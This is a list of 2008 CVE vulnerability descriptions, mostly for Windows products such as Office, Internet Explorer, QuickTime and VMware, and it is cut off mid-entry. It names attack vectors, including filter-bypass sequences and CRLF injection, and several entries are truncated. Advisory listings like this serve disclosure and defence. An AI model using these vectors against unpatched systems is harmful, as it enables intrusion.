Microsoft Office Word 2000 SP3 and 2002 SP3 and Office 2004 for Mac allow remote attackers to execute arbitrary code via a Word document with a crafted lcbPlcfBkfSdt field in the File Information Block (FIB), which bypasses an initialization step and triggers an "arbitrary free," aka "Word Memory Corruption Vulnerability." [CVE-2008-4020] Cross-site scripting (XSS) vulnerability in Microsoft Office XP SP3 allows remote attackers to inject arbitrary web script or HTML via a document that contains a "Content-Disposition: attachment" header and is accessed through a cdo: URL, which renders the content instead of raising a File Download dialog box, aka "Vulnerability in Content-Disposition Header Vulnerability." [CVE-2008-4019] Integer overflow in the REPT function in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3973] Unspecified vulnerability in the SQLPlus Windows GUI component in Oracle Database allows local users to affect confidentiality via unknown vectors. [CVE-2008-3956] orgchart.exe in Microsoft Organization Chart 2.00 allows user-assisted attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .opx file. [CVE-2008-3897] DiskCryptor 0.2.6 on Windows stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer before and after use, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3851] Multiple directory traversal vulnerabilities in Pluck CMS 4.5.2 on Windows allow remote attackers to include and execute arbitrary local files via a ..\ (dot dot backslash) in the (1) blogpost, (2) cat, and (3) file parameters to data/inc/themes/predefined_variables.php, as reachable through index.php [CVE-2008-3843] Request Validation (aka the ValidateRequest filters) in ASP.NET in Microsoft .NET Framework with the MS07-040 update does not properly detect dangerous client input, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated by a query string containing a "<~/" (less-than tilde slash) sequence followed by a crafted STYLE element. [CVE-2008-3842] Request Validation (aka the ValidateRequest filters) in ASP.NET in Microsoft .NET Framework without the MS07-040 update does not properly detect dangerous client input, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated by a query string containing a "</" (less-than slash) sequence. [CVE-2008-3704] Heap-based buffer overflow in the MaskedEdit ActiveX control in Msmask32.ocx 6.0.81.69, and possibly other versions before 6.0.84.18, in Microsoft Visual Studio 6.0, Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 allows remote attackers to execute arbitrary code via a long Mask parameter, related to not "validating property values with boundary checks," as exploited in the wild in August 2008, aka "Masked Edit Control Memory Corruption Vulnerability." [CVE-2008-3703] The management console in the Volume Manager Scheduler Service (aka VxSchedService.exe) in Symantec Veritas Storage Foundation for Windows (SFW) 5.0, 5.0 RP1a, and 5.1 accepts NULL NTLMSSP authentication, which allows remote attackers to execute arbitrary code via requests to the service socket that create "snapshots schedules" registry values specifying future command execution. NOTE: this issue exists because of an incomplete fix for CVE-2007-2279. [CVE-2008-3698] Unspecified vulnerability in the OpenProcess function in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 on Windows allows local host OS users to gain privileges on the host OS via unknown vectors. [CVE-2008-3635] Stack-based buffer overflow in QuickTimeInternetExtras.qtx in an unspecified third-party Indeo v3.2 (aka IV32) codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. [CVE-2008-3630] mDNSResponder in Apple Bonjour for Windows before 1.0.5, when an application uses the Bonjour API for unicast DNS, does not choose random values for transaction IDs or source ports in DNS requests, which makes it easier for remote attackers to spoof DNS responses, a different vulnerability than CVE-2008-1447. [CVE-2008-3628] Apple QuickTime before 7.5.5 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image, related to an "invalid pointer issue." [CVE-2008-3623] Heap-based buffer overflow in CoreGraphics in Apple Safari before 3.2 on Windows, in iPhone OS 1.0 through 2.2.1, and in iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted image, related to improper handling of color spaces. [CVE-2008-3615] ir50_32.qtx in an unspecified third-party Indeo v5 codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, accesses uninitialized memory, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. [CVE-2008-3614] Integer overflow in Apple QuickTime before 7.5.5 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image, which triggers heap corruption. [CVE-2008-3539] Unspecified vulnerability in HP OpenView Select Identity (HPSI) Connectors on Windows, as used in HPSI Active Directory Connector 2.30 and earlier, HPSI SunOne Connector 1.14 and earlier, HPSI eDirectory Connector 1.12 and earlier, HPSI eTrust Connector 1.02 and earlier, HPSI OID Connector 1.02 and earlier, HPSI IBM Tivoli Dir Connector 1.02 and earlier, HPSI TOPSecret Connector 2.22.001 and earlier, HPSI RACF Connector 1.12.001 and earlier, HPSI ACF2 Connector 1.02 and earlier, HPSI OpenLDAP Connector 1.02 and earlier, and HPSI BiDir DirX Connector 1.00.003 and earlier, allows local users to obtain sensitive information via unknown vectors. [CVE-2008-3538] Unspecified vulnerability in HP Enterprise Discovery 2.0 through 2.52 on Windows allows remote authenticated users to execute arbitrary code via unknown vectors. NOTE: the initial description of this CVE was inadvertently associated with libxml2, but it should be for HP Enterprise Discovery. [CVE-2008-3493] vncviewer.exe in RealVNC Windows Client 4.1.2.0 allows remote VNC servers to cause a denial of service (application crash) via a crafted frame buffer update packet. [CVE-2008-3477] Microsoft Excel 2000 SP3, 2002 SP3, and 2003 SP2 and SP3 does not properly validate data in the VBA Performance Cache when processing an Office document with an embedded object, which allows remote attackers to execute arbitrary code via an Excel file containing a crafted value, leading to heap-based buffer overflows, integer overflows, array index errors, and memory corruption, aka "Calendar Object Validation Vulnerability." [CVE-2008-3476] Microsoft Internet Explorer 5.01 SP4 and 6 does not properly handle errors associated with access to uninitialized memory, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "HTML Objects Memory Corruption Vulnerability." [CVE-2008-3475] Microsoft Internet Explorer 6 does not properly handle errors related to using the componentFromPoint method on xml objects that have been (1) incorrectly initialized or (2) deleted, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2008-3474] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy and obtain sensitive information via a crafted HTML document, aka "Cross-Domain Information Disclosure Vulnerability." [CVE-2008-3473] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "Event Handling Cross-Domain Vulnerability." [CVE-2008-3472] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "HTML Element Cross-Domain Vulnerability." [CVE-2008-3471] Stack-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3466] Microsoft Host Integration Server (HIS) 2000, 2004, and 2006 does not limit RPC access to administrative functions, which allows remote attackers to bypass authentication and execute arbitrary programs via a crafted SNA RPC message using opcode 1 or 6 to call the CreateProcess function, aka "HIS Command Execution Vulnerability." [CVE-2008-3460] WPGIMP32.FLT in Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3459] Unspecified vulnerability in OpenVPN 2.1-beta14 through 2.1-rc8, when running on non-Windows systems, allows remote servers to execute arbitrary commands via crafted (1) lladdr and (2) iproute configuration directives, probably related to shell metacharacters. [CVE-2008-3365] Directory traversal vulnerability in index.php in Pixelpost 1.7.1 on Windows, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language_full parameter. [CVE-2008-3363] Directory traversal vulnerability in user_portal.php in the Dokeos E-Learning System 1.8.5 on Windows allows remote attackers to include and execute arbitrary local files via a ..\ (dot dot backslash) in the include parameter. [CVE-2008-3173] Microsoft Internet Explorer allows web sites to set cookies for domains that have a public suffix with more than one dot character, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session, aka "Cross-Site Cooking." NOTE: this issue may exist because of an insufficient fix for CVE-2004-0866. [CVE-2008-3158] Unspecified vulnerability in NWFS.SYS in Novell Client for Windows 4.91 SP4 has unknown impact and attack vectors, possibly related to IOCTL requests that overwrite arbitrary memory. [CVE-2008-3079] Unspecified vulnerability in Opera before 9.51 on Windows allows attackers to execute arbitrary code via unknown vectors. [CVE-2008-3021] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3020] Microsoft Office 2000 SP3 and XP SP3 [CVE-2008-3019] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3018] Microsoft Office 2000 SP3, XP SP3, and 2003 SP2 [CVE-2008-3015] Integer overflow in gdiplus.dll in GDI+ in Microsoft Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a BMP image file with a malformed BitMapInfoHeader that triggers a buffer overflow, aka "GDI+ BMP Integer Overflow Vulnerability." [CVE-2008-3007] Argument injection vulnerability in a URI handler in Microsoft Office XP SP3, 2003 SP2 and SP3, 2007 Office System Gold and SP1, and Office OneNote 2007 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted onenote:// URL, aka "Uniform Resource Locator Validation Error Vulnerability." [CVE-2008-3006] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3005] Array index vulnerability in Microsoft Office Excel 2000 SP3 and 2002 SP3, and Office 2004 and 2008 for Mac allows remote attackers to execute arbitrary code via an Excel file with a crafted array index for a FORMAT record, aka the "Excel Index Array Vulnerability." [CVE-2008-3004] Microsoft Office Excel 2000 SP3, 2002 SP3, and 2003 SP2 and SP3 [CVE-2008-3003] Microsoft Office Excel 2007 Gold and SP1 does not properly delete the PWD (password) string from connections.xml when a .xlsx file is configured not to save the remote data session password, which allows local users to obtain sensitive information and obtain access to a remote data source, aka the "Excel Credential Caching Vulnerability." [CVE-2008-2959] Buffer overflow in a certain ActiveX control (vb6skit.dll) in Microsoft Visual Basic Enterprise Edition 6.0 SP6 might allow remote attackers to execute arbitrary code via a long lpstrLinkPath argument to the fCreateShellLink function. [CVE-2008-2949] Cross-domain vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to change the location property of a frame via the String data type, and use a frame from a different domain to observe domain-independent events, as demonstrated by observing onkeydown events with caballero-listener. NOTE: according to Microsoft, this is a duplicate of CVE-2008-2947, possibly a different attack vector. [CVE-2008-2948] Cross-domain vulnerability in Microsoft Internet Explorer 7 and 8 allows remote attackers to change the location property of a frame via the Object data type, and use a frame from a different domain to observe domain-independent events, as demonstrated by observing onkeydown events with caballero-listener. NOTE: according to Microsoft, this is a duplicate of CVE-2008-2947, possibly a different attack vector. [CVE-2008-2947] Cross-domain vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, and 7 allows remote attackers to access restricted information from other domains via JavaScript that uses the Object data type for the value of a (1) location or (2) location.href property, related to incorrect determination of the origin of web script, aka "Window Location Property Cross-Domain Vulnerability." NOTE: according to Microsoft, CVE-2008-2948 and CVE-2008-2949 are duplicates of this issue, probably different attack vectors. [CVE-2008-2908] Multiple stack-based buffer overflows in a certain ActiveX control in ienipp.ocx in Novell iPrint Client for Windows before 4.36 allow remote attackers to execute arbitrary code via a long value of the (1) operation, (2) printer-url, or (3) target-frame parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-2894] Directory traversal vulnerability in the FTP client in NCH Software Classic FTP 1.02 for Windows allows remote FTP servers to create or overwrite arbitrary files via a .. (dot dot) in a response to a LIST command, a related issue to CVE-2002-1345. [CVE-2008-2841] Argument injection vulnerability in XChat 2.8.7b and earlier on Windows, when Internet Explorer is used, allows remote attackers to execute arbitrary commands via the --command parameter in an ircs:// URI. [CVE-2008-2821] Directory traversal vulnerability in the FTP client in Glub Tech Secure FTP before 2.5.16 on Windows allows remote FTP servers to create or overwrite arbitrary files via a ..\ (dot dot backslash) in a response to a LIST command, a related issue to CVE-2002-1345. [CVE-2008-2810] Mozilla Firefox before 2.0.0.15 and SeaMonkey before 1.1.10 do not properly identify the context of Windows shortcut files, which allows user-assisted remote attackers to bypass the Same Origin Policy via a crafted web site for which the user has previously saved a shortcut. [CVE-2008-2752] Microsoft Word 2000 9.0.2812 and 2003 11.8106.8172 does not properly handle unordered lists, which allows user-assisted remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .doc file. NOTE: some of these details are obtained from third party information. [CVE-2008-2747] No-IP Dynamic Update Client (DUC) 2.2.1 on Windows uses weak permissions for the HKLM\SOFTWARE\Vitalwerks\DUC registry key, which allows local users to obtain obfuscated passwords and other sensitive information by reading the (1) TrayPassword, (2) Username, (3) Password, and (4) Hosts registry values. [CVE-2008-2703] Multiple stack-based buffer overflows in Novell GroupWise Messenger (GWIM) Client before 2.0.3 HP1 for Windows allow remote attackers to execute arbitrary code via "spoofed server responses" that contain a long string after the NM_A_SZ_TRANSACTION_ID field name. [CVE-2008-2463] The Microsoft Office Snapshot Viewer ActiveX control in snapview.ocx 10.0.5529.0, as distributed in the standalone Snapshot Viewer and Microsoft Office Access 2000 through 2003, allows remote attackers to download arbitrary files to a client machine via a crafted HTML document or e-mail message, probably involving use of the SnapshotPath and CompressedPath properties and the PrintSnapshot method. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2008-2430] Integer overflow in the Open function in modules/demux/wav.c in VLC Media Player 0.8.6h on Windows allows remote attackers to execute arbitrary code via a large fmt chunk in a WAV file. [CVE-2008-2427] Stack-based buffer overflow in NConvert 4.92, GFL SDK 2.82, and XnView 1.93.6 on Windows and 1.70 on Linux and FreeBSD allows user-assisted remote attackers to execute arbitrary code via a crafted format keyword in a Sun TAAC file. [CVE-2008-2400] Unspecified vulnerability in stunnel before 4.23, when running as a service on Windows, allows local users to gain privileges via unknown attack vectors. [CVE-2008-2326] mDNSResponder in the Bonjour Namespace Provider in Apple Bonjour for Windows before 1.0.5 allows attackers to cause a denial of service (NULL pointer dereference and application crash) by resolving a crafted .local domain name that contains a long label. [CVE-2008-2325] QuickLook in Apple Mac OS X 10.4.11 and 10.5.4 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted Microsoft Office file, related to insufficient "bounds checking." [CVE-2008-2307] Unspecified vulnerability in WebKit in Apple Safari before 3.1.2, as distributed in Mac OS X before 10.5.4, and standalone for Windows and Mac OS X 10.4, allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via vectors involving JavaScript arrays that trigger memory corruption. [CVE-2008-2306] Apple Safari before 3.1.2 on Windows does not properly interpret the URLACTION_SHELL_EXECUTE_HIGHRISK Internet Explorer zone setting, which allows remote attackers to bypass intended access restrictions, and force a client system to download and execute arbitrary files. [CVE-2008-2259] Microsoft Internet Explorer 6 and 7 does not perform proper "argument validation" during print preview, which allows remote attackers to execute arbitrary code via unknown vectors, aka "HTML Component Handling Vulnerability." [CVE-2008-2258] Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory in certain conditions, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via vectors related to a document object "appended in a specific order" with "particular functions ... performed on" document objects, aka "HTML Objects Memory Corruption Vulnerability" or "Table Layout Memory Corruption Vulnerability," a different vulnerability than CVE-2008-2257. [CVE-2008-2257] Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory in certain conditions, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via vectors related to a document object "appended in a specific order," aka "HTML Objects Memory Corruption Vulnerability" or "XHTML Rendering Memory Corruption Vulnerability," a different vulnerability than CVE-2008-2258. [CVE-2008-2256] Microsoft Internet Explorer 5.01, 6, and 7 does not properly handle objects that have been incorrectly initialized or deleted, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2008-2255] Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, a different vulnerability than CVE-2008-2254, aka "HTML Object Memory Corruption Vulnerability." [CVE-2008-2254] Microsoft Internet Explorer 6 and 7 accesses uninitialized memory, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, aka "HTML Object Memory Corruption Vulnerability." [CVE-2008-2244] Microsoft Office Word 2002 SP3 allows remote attackers to execute arbitrary code via a .doc file that contains malformed data, as exploited in the wild in July 2008, and as demonstrated by attachement.doc. [CVE-2008-2163] Cross-site scripting (XSS) vulnerability in IBM Lotus Quickr 8.1 before Hotfix 5 for Windows and AIX, and before Hotfix 3 for i5/OS, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to "WYSIWYG editors." [CVE-2008-2161] Buffer overflow in TFTP Server SP 1.4 and 1.5 on Windows, and possibly other versions, allows remote attackers to execute arbitrary code via a long TFTP error packet. NOTE: some of these details are obtained from third party information. [CVE-2008-2159] Microsoft Internet Explorer 7 can save encrypted pages in the cache even when the DisableCachingOfSSLPages registry setting is enabled, which might allow local users to obtain sensitive information. [CVE-2008-2158] Multiple stack-based buffer overflows in the Command Line Interface process in the Server Agent in EMC AlphaStor 3.1 SP1 for Windows allow remote attackers to execute arbitrary code via crafted TCP packets to port 41025. [CVE-2008-2157] robotd in the Library Manager in EMC AlphaStor 3.1 SP1 for Windows allows remote attackers to execute arbitrary commands via an unspecified string field in a packet to TCP port 3500. [CVE-2008-2143] Unspecified versions of Microsoft Outlook Web Access (OWA) use the Cache-Control: no-cache HTTP directive instead of no-store, which might cause web browsers that follow RFC-2616 to cache sensitive information. [CVE-2008-2099] Unspecified vulnerability in VMCI in VMware Workstation 6 before 6.0.4 build 93057, VMware Player 2 before 2.0.4 build 93057, and VMware ACE 2 before 2.0.2 build 93057 on Windows allows guest OS users to execute arbitrary code on the host OS via unspecified vectors. [CVE-2008-2010] Unspecified vulnerability in Apple QuickTime Player on Windows XP SP2 and Vista SP1 allows remote attackers to execute arbitrary code via a crafted QuickTime media file. NOTE: as of 20080429, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-1998] The NNSTAT (aka SYSPROC.NNSTAT) procedure in IBM DB2 8 before FP16, 9.1 before FP4a, and 9.5 before FP1 on Windows allows remote authenticated users to overwrite arbitrary files via the log file parameter. [CVE-2008-1932] Integer overflow in Realtek HD Audio Codec Drivers RTKVHDA.sys and RTKVHDA64.sys before 6.0.1.5605 on Windows Vista allows local users to execute arbitrary code via a crafted IOCTL request. [CVE-2008-1931] Realtek HD Audio Codec Drivers RTKVHDA.sys and RTKVHDA64.sys before 6.0.1.5605 on Windows Vista allow local users to create, write, and read registry keys via a crafted IOCTL request. [CVE-2008-1898] A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call. [CVE-2008-1709] Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long malformed Project line beginning with a 'Project("{}") =' sequence, probably a different vector than CVE-2008-0250. [CVE-2008-1667] The Probe Builder Service (aka PBOVISServer.exe) in European Performance Systems (EPS) Probe Builder 2.2 before A.02.20.901, as used in HP OpenView Internet Services (OVIS) on Windows, allows remote attackers to kill arbitrary processes via a process ID number in an unspecified opcode. [CVE-2008-1663] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) 2.1.10 and 2.1.11 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1625] aavmker4.sys in avast! Home and Professional 4.7 for Windows does not properly validate input to IOCTL 0xb2d60030, which allows local users to gain privileges via certain IOCTL requests. [CVE-2008-1611] Stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a denial of service or execute arbitrary code via a long filename in a read or write request. [CVE-2008-1581] Heap-based buffer overflow in Apple QuickTime before 7.5 on Windows allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted packed scanlines in PixData structures in a PICT image. [CVE-2008-1547] Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. [CVE-2008-1545] The setRequestHeader method of the XMLHttpRequest object in Microsoft Internet Explorer 7 does not restrict the dangerous Transfer-Encoding HTTP request header, which allows remote attackers to conduct HTTP request splitting and HTTP request smuggling attacks via a POST containing a "Transfer-Encoding: chunked" header and a request body with an incorrect chunk size. [CVE-2008-1544] The setRequestHeader method of the XMLHttpRequest object in Microsoft Internet Explorer 5.01, 6, and 7 does not block dangerous HTTP request headers when certain 8-bit character sequences are appended to a header name, which allows remote attackers to (1) conduct HTTP request splitting and HTTP request smuggling attacks via an incorrect Content-Length header, (2) access arbitrary virtual hosts via a modified Host header, (3) bypass referrer restrictions via an incorrect Referer header, and (4) bypass the same-origin policy and obtain sensitive information via a crafted request header. [CVE-2008-1455] A "memory calculation error" in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, 2003 SP2, and 2007 through SP1 [CVE-2008-1442] Heap-based buffer overflow in the substringData method in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code, related to an unspecified manipulation of a DOM object before a call to this method, aka the "HTML Objects Memory Corruption Vulnerability." [CVE-2008-1438] Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (disk space exhaustion) via a file with "crafted data structures" that trigger the creation of large temporary files, a different vulnerability than CVE-2008-1437. [CVE-2008-1437] Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (engine hang and restart) via a crafted file, a different vulnerability than CVE-2008-1438. [CVE-2008-1434] Use-after-free vulnerability in Microsoft Word in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 Office System SP1 and earlier allows remote attackers to execute arbitrary code via an HTML document with a large number of Cascading Style Sheets (CSS) selectors, related to a "memory handling error" that triggers memory corruption. [CVE-2008-1402] MG-SOFT Net Inspector 6.5.0.828 and earlier for Windows allows remote attackers to cause a (1) denial of service (exception and crash) via a UDP packet to the SNMP Trap Service (MgWTrap3.exe) or (2) denial of service (device freeze or memory consumption) via a malformed request to the Net Inspector Server (niengine). [CVE-2008-1401] Format string vulnerability in the Net Inspector HTTP server (mghttpd) in MG-SOFT Net Inspector 6.5.0.828 and earlier for Windows allows remote attackers to execute arbitrary code via format string specifiers in the URI, which is recorded in a log file. [CVE-2008-1400] Directory traversal vulnerability in the Net Inspector HTTP Server (mghttpd) in MG-SOFT Net Inspector 6.5.0.828 and earlier for Windows allows remote attackers to read arbitrary files via a "..\" (dot dot backslash) or "../" (dot dot slash) in the URI. [CVE-2008-1368] CRLF injection vulnerability in Microsoft Internet Explorer 5 and 6 allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded CRLF (%0D%0A) before the FTP command, which causes the commands to be inserted into an authenticated FTP connection established earlier in the same browser session, as demonstrated using a DELE command, a variant or possibly a regression of CVE-2004-1166. NOTE: a trailing "//" can force Internet Explorer to try to reuse an existing authenticated connection. [CVE-2008-1363] VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges via an unspecified manipulation of a config.ini file located in an Application Data folder, which can be used for "hijacking the VMX process." [CVE-2008-1362] VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges or cause a denial of service by impersonating the authd process through an unspecified use of an "insecurely created named pipe," a different vulnerability than CVE-2008-1361. [CVE-2008-1361] VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges via an unspecified manipulation that causes the authd process to connect to an arbitrary named pipe, a different vulnerability than CVE-2008-1362. [CVE-2008-1337] The instant message service in Timbuktu Pro 8.6.5 RC 229 and earlier for Windows allows remote attackers to cause (1) a denial of service (daemon crash) via an invalid Version field or (2) a denial of service (CPU consumption and daemon termination) via an invalid or partial message. [CVE-2008-1330] Unspecified vulnerability in the Windows client API in Novell GroupWise 7 before SP3 and 6.5 before SP6 Update 3 allows remote authenticated users to access the non-shared stored e-mail messages of another user who has shared at least one folder with the attacker. [CVE-2008-1299] Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine ServiceDesk Plus 7.0.0 Build 7011 for Windows allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. NOTE: the provenance of this information is unknown [CVE-2008-1280] Acronis True Image Windows Agent 1.0.0.54 and earlier, included in Acronis True Image Enterprise Server 9.5.0.8072 and the other True Image packages, allows remote attackers to cause a denial of service (crash) via a malformed packet to port 9876, which triggers a NULL pointer dereference. [CVE-2008-1204] Multiple cross-site scripting (XSS) vulnerabilities in the Administration Console in Sun Java System Access Manager 7.1 and 7 2005Q4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the (1) Help and (2) Version windows. [CVE-2008-1201] Multiple unspecified vulnerabilities in FLA file parsing in Adobe Flash CS3 Professional, Flash Professional 8, and Flash Basic 8 on Windows allow user-assisted remote attackers to execute arbitrary code via a crafted .FLA file. [CVE-2008-1200] Unspecified vulnerability in Microsoft Access allows remote user-assisted attackers to execute arbitrary code via a crafted .MDB file, possibly related to Jet Engine (msjet40.dll). NOTE: this is probably a different issue than CVE-2007-6026. [CVE-2008-1118] Timbuktu Pro 8.6.5 for Windows, and possibly 8.7 for Mac OS X, does not perform input validation before logging information fields taken from packets from a remote peer, which allows remote attackers to generate crafted log entries, and possibly avoid detection of attacks, via modified (1) computer name, (2) user name, and (3) IP address fields. [CVE-2008-1117] Directory traversal vulnerability in the Notes (aka Flash Notes or instant messages) feature in tb2ftp.dll in Timbuktu Pro 8.6.5 for Windows, and possibly 8.7 for Mac OS X, allows remote attackers to upload files to arbitrary locations via a destination filename with a \ (backslash) character followed by ../ (dot dot slash) sequences. NOTE: this can be leveraged for code execution by writing to a Startup folder. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2007-4220. [CVE-2008-1092] Buffer overflow in msjet40.dll before 4.0.9505.0 in Microsoft Jet Database Engine allows remote attackers to execute arbitrary code via a crafted Word file, as exploited in the wild in March 2008. NOTE: as of 20080513, Microsoft has stated that this is the same issue as CVE-2007-6026. [CVE-2008-1091] Unspecified vulnerability in Microsoft Word in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 Office System SP1 and earlier allows remote attackers to execute arbitrary code via a Rich Text Format (.rtf) file with a malformed string that triggers a "memory calculation error" and a heap-based buffer overflow, aka "Object Parsing Vulnerability." [CVE-2008-1090] Unspecified vulnerability in Microsoft Visio 2002 SP2, 2003 SP2 and SP3, and 2007 up to SP1 allows user-assisted remote attackers to execute arbitrary code via a crafted .DXF file, aka "Visio Memory Validation Vulnerability." [CVE-2008-1089] Unspecified vulnerability in Microsoft Visio 2002 SP2, 2003 SP2 and SP3, and 2007 up to SP1 allows user-assisted remote attackers to execute arbitrary code via a Visio file containing crafted object header data, aka "Visio Object Header Vulnerability." [CVE-2008-1088] Microsoft Project 2000 Service Release 1, 2002 SP1, and 2003 SP2 allows user-assisted remote attackers to execute arbitrary code via a crafted Project file, related to improper validation of "memory resource allocations." [CVE-2008-1085] Use-after-free vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 through SP1, and 7 allows remote attackers to execute arbitrary code via a crafted data stream that triggers memory corruption, as demonstrated using an invalid MIME-type that does not have a registered handler. [CVE-2008-1024] Apple Safari before 3.1.1, when running on Windows XP or Vista, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a file download with a crafted file name, which triggers memory corruption. [CVE-2008-1023] Heap-based buffer overflow in Clip opcode parsing in Apple QuickTime before 7.4.5 on Windows allows remote attackers to execute arbitrary code via a crafted PICT image file. [CVE-2008-1021] Heap-based buffer overflow in Animation codec content handling in Apple QuickTime before 7.4.5 on Windows allows remote attackers to execute arbitrary code via a crafted movie with run length encoding. [CVE-2008-1020] Heap-based buffer overflow in quickTime.qts in Apple QuickTime before 7.4.5 on Windows allows remote attackers to execute arbitrary code via a crafted PICT image file with Kodak encoding, related to error checking and error messages. [CVE-2008-1001] Cross-site scripting (XSS) vulnerability in Apple Safari before 3.1, when running on Windows XP or Vista, allows remote 